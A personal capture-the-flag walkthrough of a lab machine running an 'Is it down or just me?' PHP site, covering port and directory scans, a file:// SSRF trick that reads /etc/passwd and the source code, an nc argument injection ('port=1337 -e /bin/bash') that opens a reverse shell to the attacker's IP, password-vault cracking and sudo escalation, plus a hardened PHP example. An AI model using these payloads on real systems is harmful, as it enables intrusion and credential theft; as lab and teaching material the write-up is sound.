Extended version of [[Info]], based on the notes taken from the video.
# Victim IP
```
10.129.39.124
```
# Attacker IP
```
10.10.14.191
```
# Nmap
[[Nmap]]
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f6:cc:21:7c:ca:da:ed:34:fd:04:ef:e6:f9:4c:dd:f8 (ECDSA)
|_ 256 fa:06:1f:f4:bf:8c:e3:b0:c8:40:21:0d:57:06:dd:11 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Is it down or just me?
|_http-server-header: Apache/2.4.52 (Ubuntu)
3190/tcp filtered csvr-proxy
3329/tcp filtered hp-device-disc
4285/tcp filtered vrml-multi-use
4680/tcp filtered mgemanagement
4967/tcp filtered unknown
6336/tcp filtered unknown
7753/tcp filtered unknown
8999/tcp filtered bctp
10362/tcp filtered unknown
11051/tcp filtered unknown
11600/tcp filtered tempest-port
11903/tcp filtered unknown
12708/tcp filtered unknown
13199/tcp filtered unknown
15078/tcp filtered unknown
16140/tcp filtered unknown
17153/tcp filtered unknown
17609/tcp filtered unknown
25119/tcp filtered unknown
34475/tcp filtered unknown
35375/tcp filtered unknown
39696/tcp filtered unknown
40259/tcp filtered unknown
41464/tcp filtered unknown
44320/tcp filtered unknown
46811/tcp filtered unknown
49334/tcp filtered unknown
51690/tcp filtered unknown
54014/tcp filtered unknown
54250/tcp filtered unknown
59865/tcp filtered unknown
61349/tcp filtered unknown
62024/tcp filtered unknown
63662/tcp filtered unknown
65417/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 590.06 seconds
Raw packets sent: 72586 (3.194MB) | Rcvd: 70925 (2.889MB)
```
Does not have an internet connection, but can use http / https addresses.
Have an SSRF attack running in Burp Suite.
Tried other schemes such as file:// but got an error.
About to run gobuster for directory / file enumeration.
# Gobuster
[[Gobuster]]
```
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.39.124
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 319] [--> http://10.129.39.124/javascript/]
/index.php (Status: 200) [Size: 739]
/server-status (Status: 403) [Size: 278]
Progress: 47937 / 60000 (79.89%)[ERROR] parse "http://10.129.39.124/error\x1f_log": net/url: invalid control character in URL
[ERROR] parse "http://10.129.39.124/error\x1f_log.php": net/url: invalid control character in URL
Progress: 59998 / 60000 (100.00%)
===============================================================
Finished
===============================================================
```
Nothing of interest.
By requesting
```
http://+file%3a///etc/passwd
```
as the `url` parameter in the POST request we get the contents of /etc/passwd,
where we discover that the user `aleks` has the login shell `/bin/bash`.
We were also able to disclose index.php by requesting `http:// file:///var/www/html/index.php` (URL-encoded, of course) and got this source code back after HTML-decoding it:
```php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Is it down or just me?</title>
<link rel="stylesheet" href="style.css">
</head>
<body>
<header>
<img src="/logo.png" alt="Logo">
<h2>Is it down or just me?</h2>
</header>
<div class="container">
<?php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
echo '<h1>Is the port refused, or is it just you?</h1>
<form id="urlForm" action="index.php?expertmode=tcp" method="POST">
<input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
<input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
<button type="submit">Is it refused?</button>
</form>';
} else {
echo '<h1>Is that website down, or is it just you?</h1>
<form id="urlForm" action="index.php" method="POST">
<input type="url" id="url" name="url" placeholder="Please enter a URL." required><br>
<button type="submit">Is it down?</button>
</form>';
}
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' && isset($_POST['ip']) && isset($_POST['port']) ) {
$ip = trim($_POST['ip']);
$valid_ip = filter_var($ip, FILTER_VALIDATE_IP);
$port = trim($_POST['port']);
$port_int = intval($port);
$valid_port = filter_var($port_int, FILTER_VALIDATE_INT);
if ( $valid_ip && $valid_port ) {
$rc = 255; $output = '';
$ec = escapeshellcmd("/usr/bin/nc -vz $ip $port");
exec($ec . " 2>&1",$output,$rc);
echo '<div class="output" id="outputSection">';
if ( $rc === 0 ) {
echo "<font size=+1>It is up. It's just you! ð</font><br><br>";
echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
} else {
echo "<font size=+1>It is down for everyone! ð</font><br><br>";
echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
}
} else {
echo '<div class="output" id="outputSection">';
echo '<font color=red size=+1>Please specify a correct IP and a port between 1 and 65535.</font>';
}
} elseif (isset($_POST['url'])) {
$url = trim($_POST['url']);
if ( preg_match('|^https?://|',$url) ) {
$rc = 255; $output = '';
$ec = escapeshellcmd("/usr/bin/curl -s $url");
exec($ec . " 2>&1",$output,$rc);
echo '<div class="output" id="outputSection">';
if ( $rc === 0 ) {
echo "<font size=+1>It is up. It's just you! ð</font><br><br>";
echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
} else {
echo "<font size=+1>It is down for everyone! ð</font><br><br>";
}
} else {
echo '<div class="output" id="outputSection">';
echo '<font color=red size=+1>Only protocols http or https allowed.</font>';
}
}
?>
</div>
</div>
<footer>© 2024 isitdownorjustme LLC</footer>
</body>
</html>
```
```php
<?php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
echo '<h1>Is the port refused, or is it just you?</h1>
<form id="urlForm" action="index.php?expertmode=tcp" method="POST">
<input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
<input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
<button type="submit">Is it refused?</button>
</form>';
} else {
echo '<h1>Is that website down, or is it just you?</h1>
<form id="urlForm" action="index.php" method="POST">
<input type="url" id="url" name="url" placeholder="Please enter a URL." required><br>
<button type="submit">Is it down?</button>
</form>';
}
```
This stands out: it looks for a GET parameter `expertmode` with the value `tcp` to show a second form. In the handler for that form, `port` is validated via `intval()` but the raw string is what ends up in the `nc` command, and `escapeshellcmd()` does not touch spaces, so extra `nc` arguments pass straight through.
We bypassed the input filter on that form to get a reverse shell using [[Burpsuite]] with the POST body
```
ip=10.10.14.191&port=1337 -e /bin/bash
```
and, with a [[netcat|nc]] listener on port 1337, we catch the reverse shell.
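As an added example (not the box's code and not from the original notes), here is how the two `exec()` paths in that index.php could be hardened; the function names are my own:

```php
<?php
// Added example, not the box's code: hardened versions of the two exec() paths
// in index.php. escapeshellcmd() only neutralises shell metacharacters and leaves
// spaces alone, so "1337 -e /bin/bash" still reaches nc as three extra argv
// entries; escapeshellarg() single-quotes each value so it stays one argument.

function run_tcp_check(string $ip, string $port): array {
    $ip = trim($ip);
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return [255, ['Invalid IP address.']];
    }
    // The original validated intval($port) but then used the raw $port string.
    // Validate the string itself as an integer in 1..65535 and use that value.
    $port_int = filter_var(trim($port), FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 65535]]);
    if ($port_int === false) {
        return [255, ['Please specify a port between 1 and 65535.']];
    }
    $rc = 255; $output = [];
    $cmd = '/usr/bin/nc -vz ' . escapeshellarg($ip) . ' ' . escapeshellarg((string) $port_int);
    exec($cmd . ' 2>&1', $output, $rc);
    return [$rc, $output];
}

function run_url_check(string $url): array {
    $url = trim($url);
    // preg_match('|^https?://|') accepts "http:// file:///etc/passwd" because it
    // only checks the prefix. Require a well-formed URL with an http(s) scheme
    // and a host; the embedded space makes that payload fail FILTER_VALIDATE_URL.
    $parts = parse_url($url);
    if ($parts === false
        || filter_var($url, FILTER_VALIDATE_URL) === false
        || !in_array(strtolower($parts['scheme'] ?? ''), ['http', 'https'], true)
        || empty($parts['host'])) {
        return [255, ['Only protocols http or https allowed.']];
    }
    // This still lets a client ask the server to fetch internal hosts (127.0.0.1,
    // 10.x, ...); resolve $parts['host'] and reject private ranges if that matters.
    $rc = 255; $output = [];
    // --proto =http,https keeps curl on those schemes regardless of the input.
    $cmd = '/usr/bin/curl -s --proto =http,https ' . escapeshellarg($url);
    exec($cmd . ' 2>&1', $output, $rc);
    return [$rc, $output];
}
```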
We can upgrade the shell using [[upgrade shell|Upgrade Shell]]
Using the new shell we can run `whoami` or `id` to confirm we are running as the `www-data` user.
The user flag is in the directory the shell drops us into.
We have read access to part of the user `aleks` home folder, `/home/aleks`,
where we find the file `pswm` at `/home/aleks/.local/share/pswm`.
Some googling reveals that `pswm` is a Python password manager, and searching for `pswm-bruteforce` gives us the GitHub repository [pswm-decryptor](https://github.com/seriotonctf/pswm-decryptor).
We had to use [[pip]] to install its dependency `cryptocode` and change the file it reads to our copy (`pswm` in caden64's case, `pswm2` in dave's case). Running the script gives the password `flower`, which also reveals aleks' password. With that we can switch users and check our sudo permissions, which show we can run any command as root, so we run
```bash
sudo su
```
to switch to the root user and claim the root flag in `/root`